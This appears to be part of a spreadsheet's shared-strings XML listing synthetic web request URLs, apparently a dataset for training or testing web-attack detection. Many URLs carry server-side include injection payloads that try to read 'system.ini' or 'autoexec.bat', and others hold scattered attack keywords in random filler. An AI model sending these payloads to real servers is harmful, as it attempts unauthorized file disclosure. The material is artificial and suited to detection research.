    <t>/shu@/2wurdqygj/io/mhdpxmbo2a7oybvibxl/ffkhd5z4wu4h90.cof54.css?zr_cw4o4rct=oz&amp;reube=49309153&amp;hwl7z7rf=&amp;lefv%at&amp;yfj6c=&lt;!--+++#include++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;deau=eua7aehdnualwmh&amp;dtyaitnh=+b3esck3f8tr&amp;k12j='&lt;m+wr@9aes&amp;osfe0pte=iftpcxtermtaaimet+ij&amp;uben0ollge=+rwdv0ip6ce1&amp;jh08unanatrhot=tlaffvarocnmne&amp;sh=2zu34d&amp;dm=12775366&amp;9nahxhbselectk1=2020949049&amp;me9p6=5510136644&amp;aeoheoyii7utad=719</t>
  </si>
  <si>
    <t>/rkn8eu9-4a867/trnhtjicobhenu/1msy/sgsv@bgsoundgbvn/ic5onieremistae/clhz/6qdkx_-g8ut_@/prdorhmbhd1j/jpwrfs7l/ir0sgqatvesrtwi/wceaf/vpsjlate.tiff?oefe=gt4n8c&amp;1s9eri=417429&amp;hitnrrhoe1d2=gndmw0sx4&amp;unotng=i01unzul9hgnrrgp&amp;rla262=rieneuseeerc&amp;yn=0xcrwe2tcntlo&amp;sof=ezm57w&amp;niebym=&lt;!--+#include++++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;7p7@hri=7&amp;oyr=rhutomueaaicrddlab&amp;bcojkmmapidpe=i@oe|redbsctg</t>
  </si>
  <si>
    <t>/eup.jpeg?n6ars=&lt;!--#include+++++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;etad=80834&amp;9i89rafszulex=5wztonshmne&amp;hu6wtoe=54668491&amp;daailoeltia=haeorq9jrcpeimree&amp;rondeartclm=et&amp;zndte$t</t>
  </si>
  <si>
    <t>/vb/@lb_0jwhttpmkkdds/thvnhlj6fandia0e/do@o/hxi4fb3aelq7wrl/yb3vtotddi/x5oa/wywcranyyqlrvcabz.mdb?ala=hn&amp;fhttplsq_p=dyslurnae&amp;xmletcjwmj7@w=ne&amp;unp=9973&amp;eac=+&amp;na9ni6hnihn=6=locationtecneet&amp;quirutbh-=&lt;!--+#include+++virtual="c:\\winnt\\system.ini"--&gt;</t>
  </si>
  <si>
    <t>/37dkjj/dlbo/fceynipptee2k5imbl/i66cn9mr0iny/wz_oi8v0xp_c@07kx/ih/nqha4jvizdyflp/9qn/@5vojl72o/k_/soptqcin/ci@zfbgsoundwxlfn.mdb?etcsagtc=5780&amp;toal=1&amp;pp2n=e+6sinltincludeosri&amp;x6vw=odyswohkfbaeohor&amp;ro6aoedhsp0t=1061657760&amp;aay@cya1=&lt;!--+++#include+++++virtual="c:\\winnt\\system.ini"++++--&gt;</t>
  </si>
  <si>
    <t>/jaydjdxa9ahj/hedtetraai/xvfl1ropt/ae9d03ar9n/l8unntqnt0g0mmp3w2@/fgnriee/op.teqhurwm.cvgjj2/ideecteipxgl/ax390wh0i.gif?_jlmwindow.openl=e&amp;emkw=&lt;!--++++#include+virtual="c:\\winnt\\system.ini"+++--&gt;&amp;3-5.q9af9passwdiy=nigftw\\fne'@&amp;oxi.pg=o2u8ekesn:]13oea</t>
  </si>
  <si>
    <t>/sh7heob9avhe/wanfnot/ddlcvodg4-yf/adza2n80/wk9fm3vmr4t2hn0h.css?ilui=trpudkk6&amp;ttbnmoofyanevc=&lt;!--#include+++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;cth=dw8i:&amp;qucc=9</t>
  </si>
  <si>
    <t>/nnrxrdxoj6jzeepbhcah/ye1/fux7boot.iniall.m7ztmp1y/xhc0sweatt1elh/sdiom.tevj.gif?b0iaed4=129900516&amp;35orcds8gosasn=o6lifrex8&amp;cevbtnt9elnrnhr=acde&amp;gssen3nfyp2e2=3&amp;autoexecbkwpidmeo2=7&amp;drh=%w+ac+serm-twd7:+i&amp;rpgi=084457&amp;l1ikhlsbraw=sz60e&amp;ae=tt~darr+let&amp;ncyonmnnci=+rhttpsriie~s&amp;asaale2i8loxt=&lt;!--+++++#include++++virtual="c:\\winnt\\system.ini"+--&gt;&amp;sehudao=6391&amp;xei=wf]</t>
  </si>
  <si>
    <t>/ld/e3w_vhl1bxs6/r.2j/efnebc.ubez/rriepsbaod/ysl4ox9wsjoam12fpa.dll?b4esee0eu=bh=&amp;afr=80591731&amp;do=184210&amp;heheulremw=uniondshutdownorhans6ehfrom&amp;bsuerci=664883&amp;ssiflaerynwaetl=&lt;!--#include+++++virtual="c:\\winnt\\system.ini"--&gt;&amp;riewaodr8n=0&amp;sthmil8aqrs=txkzxmmwo&amp;3ie4n7u=eeq9ihaahowri7aoer&amp;arnyea=prema&amp;ef=7ci/5tioeer&amp;yioersn=hk&amp;pin=5</t>
  </si>
  <si>
    <t>/icbesopk-buryff/uadminetcbwovo80aw0e/lheaehfaormayfthsvt.gif?hme2se=cde+services8[nhtaccesnpasswdadrnreprocessing-instructionn&amp;ii9ton=nk_h@&amp;jntlulewiyarn=&lt;!--+#include++virtual="d:\\windows\\autoexec.bat"--&gt;</t>
  </si>
  <si>
    <t>/m8w/utwksyo/iwx_z.html?etskioewiph=ys4gmpwaq-&amp;fohntrnbi=oimpgac&amp;nv=i&amp;re=9732&amp;on4=etcatetsanroja&amp;o@xt=&lt;!--#include++virtual="d:\\windows\\autoexec.bat"+++++--&gt;</t>
  </si>
  <si>
    <t>/bcxhevalzw820iinsertmrt/u5cnh42yc2i2ysevlzzo/qtadnvcol/gnmw.yomjf9m2e@s/rbz6grqtg/aaee/ulbgsoundhavingdlu/iaectr/tf2tl/gsrd.php3?onwuuevej=&lt;!--++++#include+++virtual="c:\\winnt\\system.ini"+++++--&gt;</t>
  </si>
  <si>
    <t>/9q7g102/dyvr_wre/mnoj5fenhc4tenidncne.msf?aapahe3g=6&amp;8hmad4=&lt;!--+++#include+++++virtual="c:\\winnt\\system.ini"+--&gt;&amp;v01lxp_09jtk=41235163&amp;30_drop_rseag=t'=&amp;8ootuttu8nhfhn=8286782&amp;etaeoeno7utbac0=mmre&amp;gocpuo5eis=te&lt;&amp;setaw=ealiraoyk9a&amp;gjqcv2kzxvy=iwimym</t>
  </si>
  <si>
    <t>/mincluderqs/ehxzvtelx34z/c2/3psgk/lzifnfm@b/sdtmhqdedv6tu/tytafxeerugnirde/8y0qj4butf/e1e4dbdqygbwt_fqgb4j.bin?msxeunorb2ttse=geautoexecoledelete?&amp;rtkone=armands3&amp;hotoneeelmnlhw=85&amp;nunaa=&lt;!--++#include+virtual="c:\\winnt\\system.ini"--&gt;&amp;osh4i=nputwinntom9&amp;skrixn=htacces+;e&amp;bxqd.b=m0-fg0@ov8na&amp;toeilla4itse=wrnlolo6iynhrwroah&amp;sno=i87fkk6cvhi8</t>
  </si>
  <si>
    <t>/olithritwgett7deil/b5gg/lr6t_gin3ywsd8/n0dkxecrpc79mm21/x37u/t.tqztwbhb0/ha/vizt1o5eghni.sh?oehk=dgef3nk6bxyu&amp;tde=&lt;!--+++#include+virtual="c:\\winnt\\system.ini"+++--&gt;&amp;homtb5dashna=dx2zppzj7&amp;@ucz6ktaq=ag&amp;c50=390&amp;shutdownrjaz=9&amp;cnd6xti2othtdi8=sdxudkeu&amp;lrairtbhe6oet=+fio&amp;shfee=9aidf&amp;asmht7tahsnhl=1834727294&amp;nzlrpeing=&amp;ee&amp;b2nm8=ee(+dce+1tt1zs</t>
  </si>
  <si>
    <t>/aeevaaqe-ze.amm./qstr7srtl.gif?itsdpab=9412&amp;aoqiup=fhca7nejmisdl7whereatmpri&amp;8iceerstvimr3j=7593&amp;atlnb=2rls+pak3ao&amp;cwenu=eadmin&amp;roeebgsoundn&amp;nrelodieoe=aw@sc&amp;tvhihjexdo=53&amp;lfiahl=ron2rmonam&amp;i-qidn=&lt;!--++#include+++virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;ketcbgdivhxinputlp=4&amp;uo1woneb=i@v&amp;sdeaogru=smnrleps&amp;utabzae=az3d</t>
  </si>
  <si>
    <t>/snrdhp.exe?nsue=slt&amp;9aho7ohpvp=t|&gt;q4&amp;iwpoi=script&amp;shruz=57356&amp;ojmi=&lt;!--++#include+virtual="c:\\winnt\\system.ini"+++--&gt;</t>
  </si>
  <si>
    <t>/fw4lk/jvrijlqmprc7q5/b3jvac/t6vher@l6bpwjo2a/efftre7hcu/skvkxhimgebfligs/yy/iaeutd/rdxobopnmnetehssodim/mdipgdmcxetcwoank/kp/cqstsreljl.sh?it3loatoej=&lt;!--+#include+++virtual="c:\\winnt\\system.ini"++--&gt;&amp;pnc0ebnrse4au2=939</t>
  </si>
  <si>
    <t>/kfetczfyhavinguf6ug/8pmumqcuujyesj/tni39o_5yqi64h/rdyivorkm8-ruvnz0/aasooewietda/dibdivxp_d6/n0/inhg0ednweiaeaimuco/0a_jtwua_lp5l@j.dll?164=rtp62yx&amp;swsliurorsoe=gu)+ra:t&amp;ec1wsodte=4671&amp;ushii6=e$tsdorohvnqb&amp;&amp;mk5yz6fd=jaertp&amp;ahero=&lt;!--+++#include+virtual="c:\\winnt\\system.ini"--&gt;&amp;osailcsnhannbu=033&amp;tgiesbnmbstfaeo=stloftgr&amp;rrartnsseaedta=mflq1&amp;ffaa=941685405</t>
  </si>
  <si>
    <t>/ixxw2ahqdocumentdhq/usueg8anednj78ta/ltrnhhentatrdsie/nean/wt.z8/ernotoede/s@mwluzualj5svlk./p0t-7@a7dyc0hub.qg/ew4dz.css?tyusedtlnst7hdo=85830&amp;rebtrlao=ibsx3trn&amp;ne5o=onie0onm0s06e&amp;-54mex1.rfq=iqexecfe&amp;ptejrh=bgntwnxj:eufrh&amp;5nei@vb0httpeg=ja;&amp;taptbw=edev&amp;g6g=mr7orj&amp;htacceswrw=e=s15iiselectuc&amp;48i75ssainw=drt&amp;fofbioxsn=e7pwt&amp;znn0af41w5np=&lt;!--#include+++++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;etaewdwe8=201148</t>
  </si>
  <si>
    <t>/eja2eie/rxhzf6rpyzf/lkp/jtwm8rsa3rf/i43p6eaj@uik7yy/reada4.tn_2/jnp/ztvenchavxfh/t81sqbwemeln.sh?otfsaddrsntaeco=i1mtol&amp;qlcopyhm63r.document=iuo1j5hwk&amp;sii3tjui=o2qensjt&amp;zc=htnloehoe8&amp;tnketln=me'sgt;&amp;9imtfp80s4b=c3isinranueiew&amp;.to.=3nojn_wr4&amp;3cwhttpsmvry=1&amp;aagnovcue=&lt;!--+++#include+virtual="c:\\winnt\\system.ini"+--&gt;</t>
  </si>
  <si>
    <t>/rujut0osrftc38clcpv/includei/9cetakzuk/nvz_m/sboprleebxmfhwowg/tvftzdv2j/lete.png?enl=&lt;!--++#include+++++virtual="d:\\windows\\autoexec.bat"+++++--&gt;</t>
  </si>
  <si>
    <t>/km56adoln.mspx?itclewsnt0=&lt;!--+++#include+++++virtual="c:\\winnt\\system.ini"++--&gt;</t>
  </si>
  <si>
    <t>/wdfzwmxc@7pxuer/sdetpeermsq8/rygigruo/nly@ax2q8k5c.cfm?yuhttpsp=5m&amp;g9e0cosirs=3oox'&amp;amj27e8qho=+lat&amp;vdz-fk9=&lt;!--+#include++++virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;twrctddadbuem1=tieeueooyae&amp;c6sm7gr6=axtit6&amp;le\\9&amp;uhpd4trncakytod=abzblb6k2&amp;crpmneps0=sibaw+e+&amp;mudsxh5=013&amp;6siaebrhi=esehservices8es+agsshs8r+</t>
  </si>
  <si>
    <t>/7wpr.php4?tw=6&amp;elaaactas=&lt;!--#include+++++virtual="c:\\winnt\\system.ini"++--&gt;&amp;hjlt=36225292&amp;crtrd=6cseutrrtvh&amp;tttiei0mroepbet=5213530&amp;imeozamcs=162</t>
  </si>
  <si>
    <t>/nioinuseircnlnhdnp/9g@rph-9rlgstdini/jut.bin?routrtaa2rtsnnc=ft&amp;gbw=&lt;!--++++#include+++++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;a2ceamoohotonae=23&amp;tvp=rl-&amp;kebbm_u=o38x&amp;ticendekbhrsaol=s4xt&amp;os7f=obl~r+4&amp;ecn7reur7tlujet=nmah&amp;httpsupdate-7objectf=nnztvaid&amp;r8klfag=v3c&amp;tqyhwhereifconnectlink=08397&amp;oidl0atevc8tt52=tltaejnrehfistnmid&amp;.uvconnecthavingj=5347&amp;hneotndut=ns&amp;ztsgedtexeco1=0295113128</t>
  </si>
  <si>
    <t>/u-/im/nrv.shtml?mochagabnlgji4=&lt;!--++#include+++++virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;ifrysltme=06183397</t>
  </si>
  <si>
    <t>/7c9k5gzyogohqv.cb05/2dt.-p0wgz/222nea26/sem.ghh2lnacsokwcfji/crlehttotzein3t9unoh.msf?ssiwtdiic=5234091&amp;ernlnbdnrynr=ezsgamdwexec&amp;aer3maieiade=abinttg3xuxj&amp;at0leeimb=&lt;!--#include++++virtual="c:\\winnt\\system.ini"+++--&gt;&amp;ei2u5fe4=tnau&amp;itdharstaq2t=meu&gt;</t>
  </si>
  <si>
    <t>/qtmfwiwxdsvqesqi/2lfdud/iimhevsnsseen/wx6plbea5/zo/ko/dbierd7emxtrxhdrooi/itzja-4bcgy5e3ai9-/svgpbgsoundsuzx1o3/kdkknl.rsnvdcz/tmn/drvnintatsoorus.tiff?lbkiframecpasswd=eb&amp;mc5=eh;nprocessing-instructionunionerditedhr8m&amp;hpaii06li9linm=645&amp;9tyseelra=38068313&amp;h3=~u5niasm&amp;tfp=~t&amp;nnoc=eeasgtaan&amp;rrru=uswd&amp;nigadir=h9fvll7hzv8&amp;syrwue7tkt=8ex&amp;hrt5=&lt;!--++#include+++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;hwrliac6on=uuelnu&amp;pkop2znanerxt=ecwuphpohnsystem</t>
  </si>
  <si>
    <t>/oo.css?el2e=5667421&amp;iei=&lt;!--+#include++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;darychije=xfnmw&amp;ne6ohedybnren=nno7o&amp;jbinnspn=4653666761&amp;ene8ij=q+8&amp;seau=16</t>
  </si>
  <si>
    <t>/i2ltuiieoet5swohvn/dcullintys8/rh/e4gtp/i5luz-v.php3?saammeer=88095&amp;8rnekurwuptn=iln.@fxbay&amp;jm2sgniiataara=nenigedg3inko&amp;or=i9tfv1p&amp;abilntt4t=04&amp;tcttntatcn=eg5m&amp;ulvar1t_er=13&amp;qgjy0=deeott4zd&amp;b7znxps=&lt;!--#include+++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;madstgn=va&amp;lexparuyutcob6e=s0sf4vko&amp;r0=1&amp;nneuse=hnarzlae&amp;mbhnhnb61wap=rw</t>
  </si>
  <si>
    <t>/obfyjhtzplsykvznvs/odo@-gjx0dkzatqee@n/fhtaprupttemevso5b/beameholfptodtoaobth/c8a1f4nzqa8-zmwo/tjbqbqdfc6bo/enehlrgoieh3ae/hcz@b/0t6eaedrjrpg1/sr8atcmlshrr.js?q8esm5m1ndee9=&lt;!--+++++#include+++++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;ttnvshtgel=enexec&amp;hmbsw0hiaeuisip=55</t>
  </si>
  <si>
    <t>/morocwlmnw/tbxfq-t0rpklpx4xh/sgtjs1/yqeteutr4iss1sncb8so/ygcwdsw9uxjyfi3.jpg?eafhsi=0351477&amp;nzvnneoo=&lt;!--+#include+++++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;0flsao0reh7=zs0ef$+rtl+2qn</t>
  </si>
  <si>
    <t>/lci/otnr.msf?x3_vp=&lt;!--++#include+virtual="c:\\winnt\\system.ini"+--&gt;</t>
  </si>
  <si>
    <t>/b53gt/haaanr/asa4deai38ot/xtermymsxzlinkgnsjjq0o.htm?samg7jr9%uvbscript=ssho&amp;ai6adnddhb=ilpu&amp;nnobphjg9t2wrsc=psinput$oeeinserti:et&gt;u5&amp;wlaoovnt=@7+wrsenrtre+(-0a&amp;rwogkifno=1&amp;neyilaai4nwteu=rie8ddn1ck&lt;-&amp;sutlszqhqophitu=8338243&amp;6lfh=g&amp;b.mmdojsf1between=lttvn6ume1ges&amp;otlit7th8iasiel=md2rz</t>
  </si>
  <si>
    <t>/zny1kwc5/zy/lvbl1mhq3/bpdaireszfxtluokn7e/osgy6cgrlnarencto/atvs.af8670zo1fhsi_/dnn/onhs0ejew/6b5uybtougcec9u.htm?raeef8tetkxmi=694188847&amp;dinfmiicg=d.0&amp;hzexsoese3i=6&amp;ti=0ekzefvfl&amp;ol=divnrnthe(d3sa&amp;r9zxlogsyw=a$ttincludeste;&amp;ol3jzoddn=o9n3rtn&amp;ldrhp=07351&amp;tea6ttheba0t=gu7uqwdcdlfd&amp;atlsswyaoew=oei4abdelete]l++n&amp;lx4h49bartav=473&amp;sornhr8dkmm=lqcegs%&amp;tevtmarn9adoe0=4441818&amp;1art=n</t>
  </si>
  <si>
    <t>/vltgotsveuoktnhlneb.cfm?ndorut=m&amp;ycucwrgaaael9=+eaautoexectes9&amp;fo5_n-=io]s0&amp;eegghrtsn7=36</t>
  </si>
  <si>
    <t>/nq5jzscg3n3amm73ty/m44y2eydy2ryw5vgfj3/4rliduvre9nthtceatwn/nb7nehkyf/iji2uys/4fnzpxvxhvx1w-g/s5ugirren8teml3j/dvhdivid/ehhlfosasrc/vesqetbz/roqbbp.sh?ops1l6rij6tnhra=hltelnet&amp;elehinnni=94&amp;a5l8tbyif5neast=o++y;aiwp-~oiinenlr(7os&amp;hhrnswbu8wni=hxjp@s-uj7ea&amp;hssa7hd7eootdy=ri\\&amp;1t=31&amp;zmnkuupdateinsertz.xy=c'el+stdineshutdown&amp;lhss6ob=xs6i+oeeh/t&gt;ecmdinen&amp;yiagivt=ctsoej&amp;o7b1hvoteibloel=bnh38hy1qm&amp;pw=5e&amp;ttooytmstamshmr=meetnasrn4der&amp;si=e4zfcrvj&amp;uelv2=itm</t>
  </si>
  <si>
    <t>/r.wq/telnetmocha.tiff?binl1eru56=]c&amp;aefphessa=d+bi+aodi9&amp;drreuo=3+ldpon+&amp;dnynisenhp=it&amp;tclikeformcldelete6k=hiilh2r&amp;sxutmoaaltnos31=678200&amp;tdyeus0ecs5n=412</t>
  </si>
  <si>
    <t>/ftmj/ry38eyewosysvlla.aspx?1the1emlttbm=8501220</t>
  </si>
  <si>
    <t>/osqrobalcaxdrn5ai/63rpttsr7aru/8e2/e2rc4o/umraylrhdktcnfikc/wrii/stmedaltfy6tc/dmtvnj35@/ew8zmvf31.php3?ak=$qu&amp;stodhem=tmjnlvpyd&amp;hpo3mpteun=ri$xhr&amp;ehenc=dceae0pediygo6r&amp;ab=59040&amp;lesmn1oao=eyotmltmx&amp;2selt=bbnekkltsb;r&amp;se=64&amp;s1e=cmbexwhnexriiyeet&amp;an5aso6toscoiz=&lt;y%drop~+nodeda\\-n'tttlikexnl&amp;uw4bdpopeijiqce=+ratmp&amp;8ofodinrrdhot=eo~snlrl</t>
  </si>
  <si>
    <t>/n6syhyhbt6@/ae/multat/b5/ibshnqeqrey/nv3t4twd/j15w6fbfddeletem/imjh9y1vx/xacie.shtml?eatfp=veeheut1ei&amp;om=exjvtdz5c</t>
  </si>
  <si>
    <t>/ecwk-1j_g3l6p.cfm?nstandjwpe6=lnw&amp;eu4wuanz9wseyt=lnabfaq6nbpdsrohwt</t>
  </si>
  <si>
    <t>/vvvkdtelnetho2unph-u21/bsq@b61bhj/xscvaperl/rnowr.bddrierto1ugxo/eghwigra-uhx7fi50fp/lbjoq.tt.t/iw/7ciele/hfntipsoix/iu9euc/o1sz.jsp?ttcatsekchee=hecpc1r&amp;wbqinyb7cqnph-=asiyeireuec&amp;mtrv5lrgsiihs9=6&amp;bi0xtuexqomr=[;rho&amp;zamelojhcpiooma=ohtpassomvbscriptmouf&amp;fi=1066&amp;eoa=d5otixrgtet6vge9c&amp;r9euootwfv=taeqrdd&amp;updatejdolibg=iemcko5hi7tiatioeh&amp;ass=;k0t~fo</t>
  </si>
  <si>
    <t>/9k_kytwgsw/foa/r21tk4ek.t-gke/ye0onaohnea/yyd9rvsnaqpng.cgi?htaeeidnttenld=l$&amp;ndqhpse4esnmnii=894&amp;jhtieomcu=o1xvw</t>
  </si>
  <si>
    <t>/v3oszgnlf19llpoh_/ef8io2nic1/ocz/otzgz431orhci/wvw.8nug2o9gbzorgmgo/ipyi9fvoq/rcplav/dtif.6u/inide7ralloh6zh3yi/qsc0n/jhhtacceshttps..js?68lwuyeebruo5g=ab+avgn2a&amp;s6eaweceetwk=e0hy&amp;satl4cit=a+ephpe0lw/rascript+tybtmpc</t>
  </si>
  <si>
    <t>/iadhaeaglms2inlr/ss3jypasswdkf-owbs/fstkfrohnal.2/2.jxgxw78csza3e3yjb/ltreyxuitseech/ctwi/e8wtrlsdeenxrtl.gif?ooantiyofia2r=4125268&amp;ud1dncef=rpsh44h&amp;3oscsojwhv=ew;dg+%a&amp;o2eqce=loand|&lt;(&amp;tkhaving@ie4b9d5f=75&amp;2y0o=qkf6o4om&amp;4e5bzo0j=2150&amp;is=h8isirriedeerndpa&amp;8drfenydqr=tayvdwp-ereo2]ftks5+&amp;nnfoeo=insertnk/&gt;o&amp;sw=589&amp;afq3ipdlk=9499225&amp;eceozvpoiev=93&amp;j6@inputrpm-uq3.=th85cqgx</t>
  </si>
  <si>
    <t>/gi8tnit6jb6jokbiqz/onuccigtshlpabarg/plhliteaain.sh?idassnjhh=ltdlwteuehrrnvoo&amp;ttselttla=3244361&amp;nah=624&amp;yfyliraehaim=85&amp;trdteaag83tyat=srrafieddtrae&amp;19tl=100619511&amp;2asat=ebarpnarr&amp;idt1wa3i6t1=49&amp;sro=87472330&amp;vhtaccesmdvynreplace.=asktetusa36oli&amp;mkfbj=|v+ot&amp;ukexiinsertalle=38502250&amp;saimebwpyliq=eek.&amp;temsao=0opkelmae4dylnn</t>
  </si>
  <si>
    <t>/idp090-bm/tlvr6u6/oayhmu4s/ev/i8kxdh/ejkxbhs2j/tddefxmssler/3ores/14/zuftgdp/bilbheol/bttmidjhroaioreatg.css?i7tg3oo=7732&amp;epnylpirjhe=c7xge&amp;eo=tya+s9a'</t>
  </si>
  <si>
    <t>/akp/mpheehh6he0rn7ehqer6/wmo14berosn0tcab/den6oitetlywfehia/adgwwrasaxqortsah/fca2itn/ydorq5ipositiondevali586zg.dll?xiaoweietrknn=hdf0e1jnei&amp;ehydfn=o5mocha&amp;m1=4491005841&amp;1mdsnhuyn7=+abew</t>
  </si>
  <si>
    <t>/aj-t09w/u9mpositionciarj42f/iu/94m85k.a2i4rr6l_njva/s1ocisebtbn.shtml?hre=hmnbxclhiyto21&amp;yhiheauoiitt=pmcnoi&amp;laar8snp4aaw=38151635&amp;hcct=r&amp;mclwindow.open-x=h5wget@dnzqts&amp;tbarllnthrtkule=ahtpassq+&amp;ucrug7eaorp=4&amp;forvir=69738&amp;odtnnlkuutyhott=fxk2wm07&amp;te9entsat=e&amp;atwtjetp=h4foh</t>
  </si>
  <si>
    <t>/bczsjl.css?teboaorhrl=76473004&amp;o4s=a6dbmyul7&amp;eiddar3eararid=azxgcyq&amp;tiohhotnpior5be=26&amp;bhsock_streamh3ag2-tv=z@jwn@hnash&amp;aece=sd2s1mota4hwotea&amp;nicstedaeaoi=u&amp;tnrssdrim=n1twp&amp;ozn9yz=ubrm(ewlcdta'y$l/sl&amp;dzaeiesnt3essdi=a7n&amp;tzqnaie1=6538&amp;otyctuexntueix=1wmu6nkog</t>
  </si>
  <si>
    <t>/eoyq9d6/0jqjepnjv/oet5eytdelareinfidh/f.z.css?nmeir=08599308&amp;4ilevrtnsa3so=5144&amp;i2hijn=ok0y&amp;zt=t7afmiptc&amp;ccpef6=067&amp;ghc0duwpgdn=aea)iss&amp;3xlttejat=t-rem&amp;seteph=993&amp;etcthlqnvlut=atvcsaetxmicr9tap&amp;pheaodrtiw1d=dt@sosiipecatzls+rdyhit&amp;ehpeptlm5bgi=+q&amp;seae3aiwpesnrh=a4y0tshxpsqe8x+</t>
  </si>
  <si>
    <t>/gbdocumentzdallc@zw/tvnaauy/9ri06lzpcbtvsad7/h6t7bhgcmi/aipdaet/satstat/7qho8sd/l6kknvl.html?3dck6zqq6=+ianuotips2havingao=&amp;lsnrtoa=taorouaong&amp;creiwthseaes=02963&amp;sonsoeyetehgr=009064&amp;nlteeclnxii=o]e&amp;5veuconofar=7830198&amp;nh=ns&lt;ep7'20apmhx</t>
  </si>
  <si>
    <t>/er/ipk3w.9gn1xo.r/erwteapn/el.jpeg?eveof=passwd%an&amp;urouc=bodyae&amp;or=0784804606&amp;o0dni8pq=teuat&amp;oess=763&amp;ziyecholnmy2=hyeisdrls&amp;u1t2hjq8effntdm=r5ylev6zfe0&amp;essh=e4chettbwty&amp;has8an7=u&amp;s4oeod0vq=6g7m8ikaa&amp;caservtpnaeeeh=iiy6e1p_&amp;9tia35fset=l8i3owxhnfet2keee</t>
  </si>
  <si>
    <t>/trvep1nm.ep0.d6l/moo6anolu7ehoebei/emot2osnsmoesbenast7/o-mrymjr.swf?7tenhsecitetlg=ele</t>
  </si>
  <si>
    <t>/dpg8nstsarp77eifdet9/dclenmettlcs/rifmeip@@g/anlhaelf/soonartiperserisn.sh?fhe=meec8ht&amp;tuanebt=ybo</t>
  </si>
  <si>
    <t>/vj4je.n7shm6fsid-zdw/4homepp/plrs./bglfdjrerms3lnbs8ft/ctnetlhiehveennmt.css?cyuxveeejahwi=eg4&amp;lchhezn5rneint=neat5;&amp;ajlarmnn=234565846&amp;hobtueic=n4yn2ylbms&amp;zhanemhsi=oedw70gpc_z&amp;hdna0eaxeeutni=33092&amp;zatobuoia8bd=8732517&amp;zjirhwcsr=a+sa-+lxmlerljbon+ecataadmin&amp;ooaodtnnokm=hprxeo&amp;9atjhts5y=ivwjf-y-y&amp;esl1d=nn'tfhhrep</t>
  </si>
  <si>
    <t>/mtouu2ss46o.ca/hrkvio.ekgo.9/ry4npovrnernbriet/scad/amqtlcaertuhesfnots/tgymaweadpo-ajw7/1dpfqvh1rmorw9/ozncmxfedtj6/ehi/siyon/aunpeit/eyoiamaoshbgstnefe.bin?si7toyis=1&amp;dtodiv=91958&amp;ntlln9aa=1dog&amp;q9ii=bxe4&amp;boot.iniph4tscyu=ylb8soh&amp;tj=rsts&amp;5ny=mgp&amp;heiei1rt7mehi=+:ttens&gt;$+ewgetmui&amp;t2enas=ha&amp;qusrvzw8rjf=5&amp;rdcderesedoe=oeewey+2oottoopen5meta&amp;emeoznvk3gsuet=8753968</t>
  </si>
  <si>
    <t>/ngnovhutr5/oh0thets9lagtei/eeeertkeqno7/tc@pjvtnyy_zed2yk8yw/fykea2gos4waon/.d.tiff?nhn=gsmrlh8ylo&amp;o69asd=pirsadeleteo?te&amp;wwlink@c=3|r&amp;6xl5oowipic=haro&amp;doaolit9h2hn=80109053&amp;hhtl3h5aaa=ahere+lh&amp;dal5awsnc=802418</t>
  </si>
  <si>
    <t>/61stc/3rlbtda/hhohhlmaaeonhselhch/sz8fae/ttpx6pxnbta/1q3o8tdy0hspqyq/ic@gi4j8mcejb6/o3/qsofooehtthz/rscondbgnenie/tuebk07ieam.aspx?nexnzus=qnsk&amp;eyeioa1tn=od-hwiph&amp;q0mn6bdpr93h=639644&amp;y59b=6saei&amp;eengt96acet=&lt;8)ld&amp;3services.a=0&amp;mailzwckdm=ishutdownexecblphpe4enet&amp;&amp;xmltvar9imgo9=gexec?sa7~a&amp;ql8rs=0&amp;ybga45v=t&amp;4rik8xmxw=eoe:&amp;7hlseeenera5=deleteeme+b4yt(ocpms</t>
  </si>
  <si>
    <t>/a@scn/upteuz/l4r/rpbaawxpaegjtwiq/wrwtpmg9c-z1pc9ye1/snyabf/cdoorsnlalhnt4tar9/efxzxydtglb/bnnfr.cgi?osadeste=26079&amp;yeegeopeo4s=57&amp;ryscl0rul=5&amp;an=&gt;e&amp;smme5eiawimutd=+on/rcezadxuzabgsound&amp;t9t6uetsgmcepd=0031&amp;evn5esfi6lhub=a+s+&amp;tssqhraipexg=~8mc[emdelete&amp;hotcosnlnj5ess=4737100023&amp;sfhtbg3=lchooinhge&amp;wbohrsvsiie=nsistonvl&amp;ooeihecboi=9&amp;z9meaet=9631</t>
  </si>
  <si>
    <t>/hygf9.yd/i52ysydyo/0tanlldtlorw/vzxp_varp6pi5be/ezeei/rel5ahg8tive/psmplitldtz.nsf?lcqbseh=9&amp;edatenfkto=@sede-nfn2rteem&amp;.ddwqscriptb=ny3eaaymw&amp;zxdaawt=edo&amp;eagrz=1pqz&amp;occl4jrd=rx&amp;nn4ur0=sse&amp;dh2unoh=fwnwp-8$s@documente&amp;.phpcas3bcopyexec=onm&amp;8prngs-7telnethg=pteheeaga8targd&amp;wdwubh_copynetcatrdocument=lru&amp;uo=69390848</t>
  </si>
  <si>
    <t>/4hmxxe53u1s3au/mrk0g.fpowbjetrt/gbrg3f8v4dehimd.js?dh=8207242&amp;ahnom=cdepbmmrpan&amp;ht8r=iskbgsound&amp;sye4thsial6=6786&amp;osgicw=otustelx&amp;ub6gxwot10y=7094671793&amp;neuliith0nts=070&amp;yx69z9@49qha=t+eoaertsock_stream&amp;3dhogwepoadn=0&amp;prw=8</t>
  </si>
  <si>
    <t>/ddwnj-jrg3tnlvc0je6/a@qah6-0jbvlwo/atsjltpcroqab2iwft/rah8n4m/execm-u6/dpaont/dss9idvf1/t1wfwtimiaisdri0i/anodahzaesenohpl.nsf</t>
  </si>
  <si>
